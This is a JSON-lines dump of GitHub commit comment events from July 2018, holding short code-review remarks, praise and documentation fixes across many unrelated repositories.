{"id":"7929312178","type":"CommitCommentEvent","actor":{"login":"FreHu"},"repo":{"name":"FreHu/abap.tmbundle"},"payload":{"comment":{"id":29622410,"position":null,"line":null,"path":null,"commit_id":"e7ee2f46eb040beed311a857700e951730d5d950","created_at":"2018-07-06T14:41:23Z","updated_at":"2018-07-06T14:41:23Z","author_association":"OWNER","body":"![code_2018-07-06_16-29-38](https://user-images.githubusercontent.com/5097067/42384848-6a0f0c9c-813b-11e8-88ab-6291e3f46174.png)\r\n"}},"created_at":"2018-07-06T14:41:23Z"}
{"id":"7929312714","type":"CommitCommentEvent","actor":{"login":"superseb"},"repo":{"name":"chrisurwin/docs"},"payload":{"comment":{"id":29622411,"position":50,"line":50,"path":"content/rancher/v2.x/en/quick-start-guide/deployment/quickstart-manual-setup/_index.md","commit_id":"f966c24546554bd5d75c23dfca4215f15111d83d","created_at":"2018-07-06T14:41:29Z","updated_at":"2018-07-06T14:41:29Z","author_association":"NONE","body":"https://rancher.com/docs/rancher/v2.x/en/installation/references/"}},"created_at":"2018-07-06T14:41:29Z"}
{"id":"7929315470","type":"CommitCommentEvent","actor":{"login":"guilhermesilveira"},"repo":{"name":"joviane/cursoCPlusPlusAlura"},"payload":{"comment":{"id":29622419,"position":32,"line":32,"path":"programa.cpp","commit_id":"1a9917fe7f0bbeb934718e51f7ed57cd2fbeed8f","created_at":"2018-07-06T14:41:59Z","updated_at":"2018-07-06T14:41:59Z","author_association":"NONE","body":"ai meu coração, tá assim por enquanto? dá para ensinar alguma estrutura de c++ para arrancar isso fora? no pior dos casos um array de int resolve como map"}},"created_at":"2018-07-06T14:41:59Z"}
{"id":"7929316080","type":"CommitCommentEvent","actor":{"login":"guilhermesilveira"},"repo":{"name":"joviane/cursoCPlusPlusAlura"},"payload":{"comment":{"id":29622421,"position":32,"line":32,"path":"programa.cpp","commit_id":"1a9917fe7f0bbeb934718e51f7ed57cd2fbeed8f","created_at":"2018-07-06T14:42:07Z","updated_at":"2018-07-06T14:42:07Z","author_association":"NONE","body":"meu coracao = no curso de c ficou assim?"}},"created_at":"2018-07-06T14:42:07Z"}
{"id":"7929317704","type":"CommitCommentEvent","actor":{"login":"guilhermesilveira"},"repo":{"name":"joviane/cursoCPlusPlusAlura"},"payload":{"comment":{"id":29622425,"position":32,"line":32,"path":"programa.cpp","commit_id":"1a9917fe7f0bbeb934718e51f7ed57cd2fbeed8f","created_at":"2018-07-06T14:42:24Z","updated_at":"2018-07-06T14:42:24Z","author_association":"NONE","body":"aqui e em outros trechos da pra extrair funcoes já, pq a pessoa ja aprendeu funcoes"}},"created_at":"2018-07-06T14:42:24Z"}
{"id":"7929318853","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29622428,"position":13,"line":60,"path":"src/runtime/hexagon_cache_allocator.cpp","commit_id":"42b86f9567828eb01f194401c0793cbb55ef4661","created_at":"2018-07-06T14:42:37Z","updated_at":"2018-07-06T14:42:37Z","author_association":"NONE","body":"this is alittle awkward - maybe better to make it an inline function for the loop"}},"created_at":"2018-07-06T14:42:37Z"}
{"id":"7929320164","type":"CommitCommentEvent","actor":{"login":"craigbarnes"},"repo":{"name":"craigbarnes/lua-gumbo"},"payload":{"comment":{"id":29622431,"position":null,"line":null,"path":null,"commit_id":"733832370118e556bf2619958361a9000bfa5fd3","created_at":"2018-07-06T14:42:52Z","updated_at":"2018-07-06T14:42:52Z","author_association":"OWNER","body":"@daurnimator I just installed Void from `void-live-x86_64-musl-20171007.iso` and updated everything. The depth limit/stack overflow tests pass fine. I don't think the stack usage is a problem, except for triggering some kind of bug on OpenBSD. I probably make the tree depth limit configurable at some point.."}},"created_at":"2018-07-06T14:42:52Z"}
{"id":"7929322405","type":"CommitCommentEvent","actor":{"login":"sysexcontrol"},"repo":{"name":"eclipse/hono"},"payload":{"comment":{"id":29622434,"position":5,"line":28,"path":"example/src/main/java/org/eclipse/hono/vertx/example/base/HonoExampleConstants.java","commit_id":"7ddbe1bb77feab65416e219d0cdf868d5e4b6c82","created_at":"2018-07-06T14:43:17Z","updated_at":"2018-07-06T14:43:17Z","author_association":"CONTRIBUTOR","body":"Thanks for spotting, this came in accidentially, I will remove it!"}},"created_at":"2018-07-06T14:43:17Z"}
{"id":"7929323337","type":"CommitCommentEvent","actor":{"login":"Hack-Usagi"},"repo":{"name":"noahc3/auto-h-encore"},"payload":{"comment":{"id":29622438,"position":null,"line":null,"path":null,"commit_id":"8fd172c88735d0475d84d4a26b667413d0a42edd","created_at":"2018-07-06T14:43:27Z","updated_at":"2018-07-06T14:43:27Z","author_association":"NONE","body":"Add Japanese.\r\n[Language.txt](https://github.com/noahc3/auto-h-encore/files/2170889/Language.txt)\r\n"}},"created_at":"2018-07-06T14:43:27Z"}
{"id":"7929324199","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29622441,"position":98,"line":115,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T14:43:38Z","updated_at":"2018-07-06T14:43:38Z","author_association":"CONTRIBUTOR","body":"Fix consistency for the parens around the characters allowed in jail names. My vote is no spaces."}},"created_at":"2018-07-06T14:43:38Z"}
{"id":"7929328504","type":"CommitCommentEvent","actor":{"login":"BAAAKA"},"repo":{"name":"BAAAKA/Vwin"},"payload":{"comment":{"id":29622449,"position":null,"line":null,"path":null,"commit_id":"34f41dbc72563af1b4a41354c5e38999aba7891a","created_at":"2018-07-06T14:44:28Z","updated_at":"2018-07-06T14:44:28Z","author_association":"OWNER","body":"This looks awful  (ノ°Д°）ノ︵ ┻━┻"}},"created_at":"2018-07-06T14:44:28Z"}
{"id":"7929330970","type":"CommitCommentEvent","actor":{"login":"myeclipse8"},"repo":{"name":"myeclipse8/SpringcloudConfig"},"payload":{"comment":{"id":29622456,"position":null,"line":null,"path":null,"commit_id":"b8636a5d4021b6ef3b1a6c00320674bd91168647","created_at":"2018-07-06T14:44:57Z","updated_at":"2018-07-06T14:44:57Z","author_association":"OWNER","body":"创建respo目录"}},"created_at":"2018-07-06T14:44:57Z"}
{"id":"7929331279","type":"CommitCommentEvent","actor":{"login":"tfausak"},"repo":{"name":"tfausak/ratel"},"payload":{"comment":{"id":29622458,"position":null,"line":null,"path":null,"commit_id":"4cc34cc8a4eb129d0bcb92a60269da480fb6257e","created_at":"2018-07-06T14:45:01Z","updated_at":"2018-07-06T14:45:01Z","author_association":"OWNER","body":"Correction: Allow hspec 2.5."}},"created_at":"2018-07-06T14:45:01Z"}
{"id":"7929333416","type":"CommitCommentEvent","actor":{"login":"superseb"},"repo":{"name":"chrisurwin/docs"},"payload":{"comment":{"id":29622471,"position":5,"line":5,"path":"content/rancher/v2.x/en/quick-start-guide/deployment/quickstart-vagrant/_index.md","commit_id":"f966c24546554bd5d75c23dfca4215f15111d83d","created_at":"2018-07-06T14:45:24Z","updated_at":"2018-07-06T14:45:24Z","author_association":"NONE","body":"with a 3 node (custom) cluster created"}},"created_at":"2018-07-06T14:45:24Z"}
{"id":"7929334463","type":"CommitCommentEvent","actor":{"login":"cereda"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29622475,"position":18,"line":169,"path":"docs/chapters/rules.tex","commit_id":"f533df30fac00df79fa6a1885f07698a5e3a1d3b","created_at":"2018-07-06T14:45:37Z","updated_at":"2018-07-06T14:45:37Z","author_association":"OWNER","body":"The `output` argument block in the rule has no `required: true`. Should we update it? If so, I will officially mark this argument as required. :wink: "}},"created_at":"2018-07-06T14:45:37Z"}
{"id":"7929344669","type":"CommitCommentEvent","actor":{"login":"geekhead"},"repo":{"name":"shadycuz/netdata"},"payload":{"comment":{"id":29622497,"position":null,"line":null,"path":null,"commit_id":"a8748acfa50ebc141ae65d21f6e46907abcd9076","created_at":"2018-07-06T14:47:37Z","updated_at":"2018-07-06T14:47:37Z","author_association":"NONE","body":"Additional changes needed. I tested this and it works when you take out `[_/]` also in the sed expression on line 133. Thanks"}},"created_at":"2018-07-06T14:47:37Z"}
{"id":"7929345778","type":"CommitCommentEvent","actor":{"login":"indirectlylit"},"repo":{"name":"learningequality/kolibri"},"payload":{"comment":{"id":29622500,"position":172,"line":4349,"path":"yarn.lock","commit_id":"883795a867d681dbea8756649c7fe8c84fca44de","created_at":"2018-07-06T14:47:49Z","updated_at":"2018-07-06T14:47:49Z","author_association":"MEMBER","body":"NPM supports multiple versions of the same dependency for situations where sub-modules require conflicting versions"}},"created_at":"2018-07-06T14:47:49Z"}
{"id":"7929350987","type":"CommitCommentEvent","actor":{"login":"delagoya"},"repo":{"name":"brainstorm/ansible-ubuntu-ecs-agent"},"payload":{"comment":{"id":29622507,"position":null,"line":null,"path":null,"commit_id":"f16c98b6246e2be287e22ef7c95b1a1319fb2e10","created_at":"2018-07-06T14:48:47Z","updated_at":"2018-07-06T14:48:47Z","author_association":"NONE","body":"Full docs on installing the ECS agent on Linux hosts is at https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs-agent-install.html\r\n\r\nECS configuration documentation at https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs-agent-config.html\r\n\r\n"}},"created_at":"2018-07-06T14:48:47Z"}
{"id":"7929356390","type":"CommitCommentEvent","actor":{"login":"Adobe-Android"},"repo":{"name":"Adobe-Android/VS-Code"},"payload":{"comment":{"id":29622518,"position":null,"line":null,"path":null,"commit_id":"f902614e2995570eca4f28d9ee276a453acdb97f","created_at":"2018-07-06T14:49:41Z","updated_at":"2018-07-06T14:49:41Z","author_association":"OWNER","body":"*myself"}},"created_at":"2018-07-06T14:49:41Z"}
{"id":"7929356962","type":"CommitCommentEvent","actor":{"login":"jcelerier"},"repo":{"name":"OSSIA/libossia"},"payload":{"comment":{"id":29622522,"position":null,"line":null,"path":null,"commit_id":"3debe01730c84ae237ebb29ca07544c0b36d3c31","created_at":"2018-07-06T14:49:47Z","updated_at":"2018-07-06T14:49:47Z","author_association":"MEMBER","body":"nice, thanks ! "}},"created_at":"2018-07-06T14:49:47Z"}
{"id":"7929369304","type":"CommitCommentEvent","actor":{"login":"thorsteneckel"},"repo":{"name":"zammad/zammad"},"payload":{"comment":{"id":29622547,"position":null,"line":null,"path":null,"commit_id":"f4c50ae0fa23faa6ed4e461e2fc5202961b34598","created_at":"2018-07-06T14:51:51Z","updated_at":"2018-07-06T14:51:51Z","author_association":"COLLABORATOR","body":"#721 "}},"created_at":"2018-07-06T14:51:51Z"}
{"id":"7929372706","type":"CommitCommentEvent","actor":{"login":"nlct"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29622553,"position":18,"line":169,"path":"docs/chapters/rules.tex","commit_id":"f533df30fac00df79fa6a1885f07698a5e3a1d3b","created_at":"2018-07-06T14:52:26Z","updated_at":"2018-07-06T14:52:26Z","author_association":"COLLABORATOR","body":"Oops. Yes, we need to update the rule. `datatooltk` with abort with an error if run in batch mode without an output file specified. Not sure how to deal with requiring exactly one import in the rule (`--in` or `--csv` or `--xls` or `--ods` or `--sql` or `--probsoln`). Perhaps we should just leave `datatooltk` to gripe about it instead?"}},"created_at":"2018-07-06T14:52:26Z"}
{"id":"7929374667","type":"CommitCommentEvent","actor":{"login":"thorsteneckel"},"repo":{"name":"zammad/zammad"},"payload":{"comment":{"id":29622554,"position":null,"line":null,"path":null,"commit_id":"3186d5e4d763f8e367f8cf9d5c4eae918284bdbf","created_at":"2018-07-06T14:52:48Z","updated_at":"2018-07-06T14:52:48Z","author_association":"COLLABORATOR","body":"#2010 "}},"created_at":"2018-07-06T14:52:48Z"}
{"id":"7929374885","type":"CommitCommentEvent","actor":{"login":"superseb"},"repo":{"name":"chrisurwin/docs"},"payload":{"comment":{"id":29622555,"position":17,"line":17,"path":"content/rancher/v2.x/en/quick-start-guide/deployment/quickstart-vagrant/_index.md","commit_id":"f966c24546554bd5d75c23dfca4215f15111d83d","created_at":"2018-07-06T14:52:50Z","updated_at":"2018-07-06T14:52:50Z","author_association":"NONE","body":"cd quickstart"}},"created_at":"2018-07-06T14:52:50Z"}
{"id":"7929375628","type":"CommitCommentEvent","actor":{"login":"praveenkumaralapati"},"repo":{"name":"praveenkumaralapati/Testsampleproject"},"payload":{"comment":{"id":29622556,"position":null,"line":null,"path":null,"commit_id":"4d31a0c553ab7f064d9c6d0c5657817dadca6f6e","created_at":"2018-07-06T14:52:59Z","updated_at":"2018-07-06T14:52:59Z","author_association":"OWNER","body":"Good work Praveen"}},"created_at":"2018-07-06T14:52:59Z"}
{"id":"7929377668","type":"CommitCommentEvent","actor":{"login":"superseb"},"repo":{"name":"chrisurwin/docs"},"payload":{"comment":{"id":29622561,"position":18,"line":18,"path":"content/rancher/v2.x/en/quick-start-guide/deployment/quickstart-vagrant/_index.md","commit_id":"f966c24546554bd5d75c23dfca4215f15111d83d","created_at":"2018-07-06T14:53:22Z","updated_at":"2018-07-06T14:53:22Z","author_association":"NONE","body":"`config.yaml`"}},"created_at":"2018-07-06T14:53:22Z"}
{"id":"7929381627","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"cmangos/tbc-db"},"payload":{"comment":{"id":29622567,"position":null,"line":null,"path":null,"commit_id":"1e9bded6fb3a41bb84ebd31cc56148dfe07d76f7","created_at":"2018-07-06T14:54:07Z","updated_at":"2018-07-06T14:54:07Z","author_association":"COLLABORATOR","body":"I agree with the spell addition, but NPCs using 'guard_contested' script may have unexpected behaviour. It should be better to extend the SD2 script for those."}},"created_at":"2018-07-06T14:54:07Z"}
{"id":"7929384116","type":"CommitCommentEvent","actor":{"login":"r15ch13"},"repo":{"name":"scoopinstaller/binary-mirror"},"payload":{"comment":{"id":29622572,"position":null,"line":null,"path":null,"commit_id":"15d00e1741de602d9943b4a02a84a0a884e702b1","created_at":"2018-07-06T14:54:35Z","updated_at":"2018-07-06T14:54:35Z","author_association":"MEMBER","body":"info-zip.org was not available for some time (See https://github.com/lukesampson/scoop/issues/2126)\r\nLets leave as a backup 😁 "}},"created_at":"2018-07-06T14:54:35Z"}
{"id":"7929384148","type":"CommitCommentEvent","actor":{"login":"Skylsmoi"},"repo":{"name":"tracim/tracim_frontend"},"payload":{"comment":{"id":29622573,"position":4,"line":11,"path":"src/component/Header/MenuActionListItem/Search.jsx","commit_id":"58b6b0f39e045181f0de633a2e74f44a975f8c26","created_at":"2018-07-06T14:54:36Z","updated_at":"2018-07-06T14:54:36Z","author_association":"COLLABORATOR","body":"in react, it's readOnly, not readonly."}},"created_at":"2018-07-06T14:54:36Z"}
{"id":"7929386866","type":"CommitCommentEvent","actor":{"login":"PierreR"},"repo":{"name":"bartavelle/language-puppet"},"payload":{"comment":{"id":29622581,"position":null,"line":null,"path":null,"commit_id":"dda552c7e602661c5b9700229cfb4dee6cac7452","created_at":"2018-07-06T14:55:06Z","updated_at":"2018-07-06T14:55:06Z","author_association":"COLLABORATOR","body":";-) Sorry about that. I thought supporting two different ghc versions of ghc is plenty enough. Are you still using `ghc-8.0´ ?"}},"created_at":"2018-07-06T14:55:06Z"}
{"id":"7929386873","type":"CommitCommentEvent","actor":{"login":"shanutheflash"},"repo":{"name":"Yasir-siddiqui/Joker_dabot"},"payload":{"comment":{"id":29622582,"position":null,"line":null,"path":null,"commit_id":"55f4a3123c3a0615a091cb8bc37a06fa1b5336e6","created_at":"2018-07-06T14:55:06Z","updated_at":"2018-07-06T14:55:06Z","author_association":"NONE","body":"Wawu kang"}},"created_at":"2018-07-06T14:55:06Z"}
{"id":"7929388690","type":"CommitCommentEvent","actor":{"login":"Junjie2412"},"repo":{"name":"Junjie2412/wasppUI"},"payload":{"comment":{"id":29622584,"position":null,"line":null,"path":null,"commit_id":"7eb7cbc248c19850be1655e7cbcd8ccd194644bb","created_at":"2018-07-06T14:55:25Z","updated_at":"2018-07-06T14:55:25Z","author_association":"OWNER","body":"Looking good"}},"created_at":"2018-07-06T14:55:25Z"}
{"id":"7929389894","type":"CommitCommentEvent","actor":{"login":"shanutheflash"},"repo":{"name":"Yasir-siddiqui/Joker_dabot"},"payload":{"comment":{"id":29622586,"position":null,"line":null,"path":null,"commit_id":"d50db257381a99df0f52b87027a1a9e40528cc45","created_at":"2018-07-06T14:55:38Z","updated_at":"2018-07-06T14:55:38Z","author_association":"NONE","body":"Lmao\r\n"}},"created_at":"2018-07-06T14:55:38Z"}
{"id":"7929392328","type":"CommitCommentEvent","actor":{"login":"PierreR"},"repo":{"name":"bartavelle/language-puppet"},"payload":{"comment":{"id":29622590,"position":null,"line":null,"path":null,"commit_id":"dda552c7e602661c5b9700229cfb4dee6cac7452","created_at":"2018-07-06T14:56:06Z","updated_at":"2018-07-06T14:56:06Z","author_association":"COLLABORATOR","body":"The commit can be reverted completely."}},"created_at":"2018-07-06T14:56:06Z"}
{"id":"7929397742","type":"CommitCommentEvent","actor":{"login":"alexaring"},"repo":{"name":"miri64/RIOT"},"payload":{"comment":{"id":29622604,"position":null,"line":null,"path":null,"commit_id":"c01c8a5ef1458bf50017f0996d15c961d9bebce8","created_at":"2018-07-06T14:57:06Z","updated_at":"2018-07-06T14:57:06Z","author_association":"NONE","body":"Bravo! :+1: "}},"created_at":"2018-07-06T14:57:06Z"}
{"id":"7929398996","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"gm87/chatarang"},"payload":{"comment":{"id":29622607,"position":null,"line":null,"path":null,"commit_id":"ec7b4e94208cb0a715e8c1098e6a04a93ba6ca86","created_at":"2018-07-06T14:57:20Z","updated_at":"2018-07-06T14:57:20Z","author_association":"NONE","body":"This is a pretty big commit. Try to make them smaller so it's easier to go back to your code. Otherwise, good work! 👍 "}},"created_at":"2018-07-06T14:57:20Z"}
{"id":"7929400118","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"gm87/chatarang"},"payload":{"comment":{"id":29622612,"position":null,"line":null,"path":null,"commit_id":"a8ff6f72f413ce1dd78875ddebe1d93e77954295","created_at":"2018-07-06T14:57:32Z","updated_at":"2018-07-06T14:57:32Z","author_association":"NONE","body":"Good job using CSS in JS!"}},"created_at":"2018-07-06T14:57:32Z"}
{"id":"7929400987","type":"CommitCommentEvent","actor":{"login":"shanutheflash"},"repo":{"name":"Yasir-siddiqui/Joker_dabot"},"payload":{"comment":{"id":29622613,"position":null,"line":null,"path":null,"commit_id":"3f4eb96f7d991fd55c015901994fee18c99869ef","created_at":"2018-07-06T14:57:42Z","updated_at":"2018-07-06T14:57:42Z","author_association":"NONE","body":"Reason != what u did ;-;"}},"created_at":"2018-07-06T14:57:42Z"}
{"id":"7929401457","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"gm87/chatarang"},"payload":{"comment":{"id":29622614,"position":null,"line":null,"path":null,"commit_id":"58f973df6ba95968f881bde86c11aacde92f577b","created_at":"2018-07-06T14:57:47Z","updated_at":"2018-07-06T14:57:47Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T14:57:47Z"}
{"id":"7929402980","type":"CommitCommentEvent","actor":{"login":"nigeldkat"},"repo":{"name":"nigeldkat/firebase_auth"},"payload":{"comment":{"id":29622617,"position":null,"line":null,"path":null,"commit_id":"05614772ee262a363b43f678e4ca894ba9f6cda9","created_at":"2018-07-06T14:58:04Z","updated_at":"2018-07-06T14:58:04Z","author_association":"OWNER","body":"how the fuck do I save this code in this fucking piece of shit"}},"created_at":"2018-07-06T14:58:04Z"}
{"id":"7929403958","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"gm87/chatarang"},"payload":{"comment":{"id":29622621,"position":null,"line":null,"path":null,"commit_id":"97e10c25ce554aa00236b0243f8f7f2d41937da4","created_at":"2018-07-06T14:58:14Z","updated_at":"2018-07-06T14:58:14Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T14:58:14Z"}
{"id":"7929407107","type":"CommitCommentEvent","actor":{"login":"MikaGuraN"},"repo":{"name":"HL4A/hl4a-android"},"payload":{"comment":{"id":29622629,"position":null,"line":null,"path":null,"commit_id":"4b0bb60fd97f7ca8ff44dd4133915b6256a4c0aa","created_at":"2018-07-06T14:58:50Z","updated_at":"2018-07-06T14:58:50Z","author_association":"CONTRIBUTOR","body":"@nobodxbodon 这个是手机上正则去的注释。出了一堆问题。。以后我改一下"}},"created_at":"2018-07-06T14:58:50Z"}
{"id":"7929409358","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"Wolres/chatarang"},"payload":{"comment":{"id":29622633,"position":null,"line":null,"path":null,"commit_id":"3589b0c0697512fcbc907e4351e24ec6fb308078","created_at":"2018-07-06T14:59:15Z","updated_at":"2018-07-06T14:59:15Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T14:59:15Z"}
{"id":"7929410298","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"Wolres/chatarang"},"payload":{"comment":{"id":29622634,"position":null,"line":null,"path":null,"commit_id":"20c6bdde1080fbd1d6c73f7de4686e478b35eb8a","created_at":"2018-07-06T14:59:25Z","updated_at":"2018-07-06T14:59:25Z","author_association":"NONE","body":"Good job using CSS in JS."}},"created_at":"2018-07-06T14:59:25Z"}
{"id":"7929410489","type":"CommitCommentEvent","actor":{"login":"cereda"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29622635,"position":18,"line":169,"path":"docs/chapters/rules.tex","commit_id":"f533df30fac00df79fa6a1885f07698a5e3a1d3b","created_at":"2018-07-06T14:59:27Z","updated_at":"2018-07-06T14:59:27Z","author_association":"OWNER","body":"Oh I am confused now. :wink: I thought `output` was required in all cases, but it depends on other parameters? Regarding the import, maybe we could leave `datatooltk` to gripe about it..."}},"created_at":"2018-07-06T14:59:27Z"}
{"id":"7929413115","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"Wolres/chatarang"},"payload":{"comment":{"id":29622640,"position":null,"line":null,"path":null,"commit_id":"6c687b641495eaae4987320e7b94e4278770cea6","created_at":"2018-07-06T14:59:56Z","updated_at":"2018-07-06T14:59:56Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T14:59:56Z"}
{"id":"7929414898","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"Wolres/chatarang"},"payload":{"comment":{"id":29622645,"position":null,"line":null,"path":null,"commit_id":"9b941847e4438ce0110412af7d2d932d51574f97","created_at":"2018-07-06T15:00:15Z","updated_at":"2018-07-06T15:00:15Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T15:00:15Z"}
{"id":"7929425238","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29622671,"position":104,"line":119,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T15:01:58Z","updated_at":"2018-07-06T15:01:58Z","author_association":"CONTRIBUTOR","body":"s/next to their entry/next to the entry\r\n\r\nThe Jail Name and Release are the minimum requirements to create a new jail.  It is also recommended...\r\n\r\nIf splitting this into 2 sentences, I say get rid of However."}},"created_at":"2018-07-06T15:01:58Z"}
{"id":"7929429651","type":"CommitCommentEvent","actor":{"login":"rmoorman"},"repo":{"name":"phoenixframework/phoenix"},"payload":{"comment":{"id":29622680,"position":null,"line":null,"path":null,"commit_id":"b2938d6eac7dd3aec202fefcc0778b9de4096011","created_at":"2018-07-06T15:02:49Z","updated_at":"2018-07-06T15:02:49Z","author_association":"CONTRIBUTOR","body":"Nice use of pattern matching. 👍 "}},"created_at":"2018-07-06T15:02:49Z"}
{"id":"7929434671","type":"CommitCommentEvent","actor":{"login":"thibaudk"},"repo":{"name":"OSSIA/libossia"},"payload":{"comment":{"id":29622684,"position":null,"line":null,"path":null,"commit_id":"3debe01730c84ae237ebb29ca07544c0b36d3c31","created_at":"2018-07-06T15:03:43Z","updated_at":"2018-07-06T15:03:43Z","author_association":"MEMBER","body":"Plenty more to come!"}},"created_at":"2018-07-06T15:03:43Z"}
{"id":"7929437728","type":"CommitCommentEvent","actor":{"login":"rcdilorenzo"},"repo":{"name":"aopsfan/inventory"},"payload":{"comment":{"id":29622687,"position":null,"line":null,"path":null,"commit_id":"6a955085495c81e0e92332b995cceb2b15ef7f0e","created_at":"2018-07-06T15:04:17Z","updated_at":"2018-07-06T15:04:17Z","author_association":"COLLABORATOR","body":"Nice work!"}},"created_at":"2018-07-06T15:04:17Z"}
{"id":"7929439425","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"jakezimm99/chatarang"},"payload":{"comment":{"id":29622690,"position":null,"line":null,"path":null,"commit_id":"529989cc23a680f7666661f8484d7312b793f1fa","created_at":"2018-07-06T15:04:36Z","updated_at":"2018-07-06T15:04:36Z","author_association":"NONE","body":"This is a pretty big commit. Try to break them up and commit along the way so you have smaller code chunks to reference in the future. Otherwise, good work! 👍 "}},"created_at":"2018-07-06T15:04:36Z"}
{"id":"7929439875","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29622692,"position":157,"line":399,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T15:04:41Z","updated_at":"2018-07-06T15:04:41Z","author_association":"CONTRIBUTOR","body":"small one, remove the 4 empty spaces following \"the socket.\""}},"created_at":"2018-07-06T15:04:41Z"}
{"id":"7929442576","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"jakezimm99/chatarang"},"payload":{"comment":{"id":29622697,"position":null,"line":null,"path":null,"commit_id":"fe15cb1bc5e59db3114f93a66416fae911456170","created_at":"2018-07-06T15:05:14Z","updated_at":"2018-07-06T15:05:14Z","author_association":"NONE","body":"👍 (Again, try to make smaller commits.)"}},"created_at":"2018-07-06T15:05:14Z"}
{"id":"7929443124","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"jakezimm99/chatarang"},"payload":{"comment":{"id":29622700,"position":null,"line":null,"path":null,"commit_id":"f3dc15018dfd28a76691c9765703f75f2a952ab8","created_at":"2018-07-06T15:05:20Z","updated_at":"2018-07-06T15:05:20Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T15:05:20Z"}
{"id":"7929444284","type":"CommitCommentEvent","actor":{"login":"nlct"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29622704,"position":18,"line":169,"path":"docs/chapters/rules.tex","commit_id":"f533df30fac00df79fa6a1885f07698a5e3a1d3b","created_at":"2018-07-06T15:05:33Z","updated_at":"2018-07-06T15:05:33Z","author_association":"COLLABORATOR","body":"`--output` is required in the default batch mode (which is the mode the `datatooltk` rule uses). `--output` is not required in GUI mode, but it doesn't make sense for the rule to use GUI mode, so I think the rule should pretend the GUI mode doesn't exist and make `output` required. Agree on leaving `datatooltk` to gripe about missing input/import. :smiley: "}},"created_at":"2018-07-06T15:05:33Z"}
{"id":"7929445365","type":"CommitCommentEvent","actor":{"login":"kingRayhan"},"repo":{"name":"kingRayhan/bikeguy-forum"},"payload":{"comment":{"id":29622707,"position":null,"line":null,"path":null,"commit_id":"62552a1583f7faab31bd5f8bf4861e9eba78a00c","created_at":"2018-07-06T15:05:46Z","updated_at":"2018-07-06T15:05:46Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/7611746/42386085-54959d3e-8160-11e8-80e3-f22daf2ed6da.png)\r\n"}},"created_at":"2018-07-06T15:05:46Z"}
{"id":"7929447908","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"kiffmejs/Create-react--app-jim-app-"},"payload":{"comment":{"id":29622713,"position":null,"line":null,"path":null,"commit_id":"60d06ef193426862cced1834c92fdb316afc0019","created_at":"2018-07-06T15:06:14Z","updated_at":"2018-07-06T15:06:14Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T15:06:14Z"}
{"id":"7929449731","type":"CommitCommentEvent","actor":{"login":"Sherkhan1991"},"repo":{"name":"Sherkhan1991/crypto"},"payload":{"comment":{"id":29622724,"position":null,"line":null,"path":null,"commit_id":"93732ddfc98ebccec7b0805dda0f341fe538a0a6","created_at":"2018-07-06T15:06:35Z","updated_at":"2018-07-06T15:06:35Z","author_association":"OWNER","body":"### Url Used To Get test Function Response\r\nhttps://opencart.stagingbuilds.com/index.php?route=extension/payment/coinbase/test"}},"created_at":"2018-07-06T15:06:35Z"}
{"id":"7929450895","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"kiffmejs/Create-react--app-jim-app-"},"payload":{"comment":{"id":29622725,"position":null,"line":null,"path":null,"commit_id":"38b759842d0d67512aaa4ad783bca152c0f1007d","created_at":"2018-07-06T15:06:49Z","updated_at":"2018-07-06T15:06:49Z","author_association":"NONE","body":"👍 Good job using destructuring!"}},"created_at":"2018-07-06T15:06:49Z"}
{"id":"7929451062","type":"CommitCommentEvent","actor":{"login":"jedashford"},"repo":{"name":"flextv/react-native-google-cast"},"payload":{"comment":{"id":29622726,"position":null,"line":null,"path":null,"commit_id":"b25daab8bb8bf2452d5d28495a8301e4bdf3e2a2","created_at":"2018-07-06T15:06:51Z","updated_at":"2018-07-06T15:06:51Z","author_association":"NONE","body":"In my experience, applyTint was only executed once, and if mRemoteIndicatorDrawable was null, then the color was never changed. Maybe I'm missing something, but this still looks like the color may not be changed?"}},"created_at":"2018-07-06T15:06:51Z"}
